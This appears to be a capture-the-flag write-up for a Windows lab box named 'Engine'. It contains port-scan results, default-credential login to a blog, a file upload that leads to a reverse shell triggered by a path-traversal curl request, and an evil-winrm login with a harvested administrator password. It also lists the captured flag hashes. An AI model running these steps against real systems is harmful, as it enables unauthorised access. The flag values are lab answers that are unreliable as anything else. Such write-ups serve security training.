Info

  • Name – Engine
  • IP Address – 172.31.1.16

Enumeration

Open Ports

PortProtocolServiceVersion
53udpfiltereddomain
67udpfiltereddhcps
68udpfiltereddhcpc
69udpfilteredtftp
80tcphttpMicrosoft IIS httpd 8.5
123udpfilteredntp
135tcpmsrpcMicrosoft Windows RPC
135udpfilteredmsrpc
137udpnetbios-nsMicrosoft Windows netbios-ns
138udpfilterednetbios-dgm
139tcpnetbios-ssnMicrosoft Windows netbios-ssn
139udpfilterednetbios-ssn
161udpfilteredsnmp
162udpfilteredsnmptrap
445tcpmicrosoft-dsMicrosoft Windows Server 2008 R2 – 2012 microsoft-ds
445udpfilteredmicrosoft-ds
500udpfilteredisakmp
514udpfilteredsyslog
520udpfilteredroute
631udpfilteredipp
1434udpfilteredms-sql-m
1900udpfilteredupnp
3389tcpms-wbt-server
4500udpfilterednat-t-ike
5985tcphttpMicrosoft HTTPAPI httpd 2.0
49152udpfilteredunknown
49154tcpmsrpcMicrosoft Windows RPC
49155tcpmsrpcMicrosoft Windows RPC
49164tcpmsrpcMicrosoft Windows RPC

Exploitation

Exploit Details (SearchSploit)

Login to the blog with default credentials admin / admin. Then navigate to the content menu and select a post to enter edit mode. Then click on the file button.

Upload the code from the exploit after substuting the correct IP Address / port values.

Initiate the reverse shell.

curl 'http://172.31.1.16/blog//?theme=../../App_Data/files'
whoami

Privilege Escalation

Exploit Details (Found Credentials)

  • Name – Found Credentials
  • CVE – N/A
  • Module – N/A
  • Disclosed – N/A
  • ReferencesN/A

winPEAS shows some saved credentials for the administator account.

evil-winrm -i $ip -u administrator -p PzCEKhvj6gQMk7kA
whoami
type C:\Users\alex\Desktop\access.txt
type ..\Desktop\system.txt

Loot

access.txt - 150688cfd5d47037eda7a9bb589c8743
system.txt - d345d4ac0d810fcfb63b8be2b7e3bb71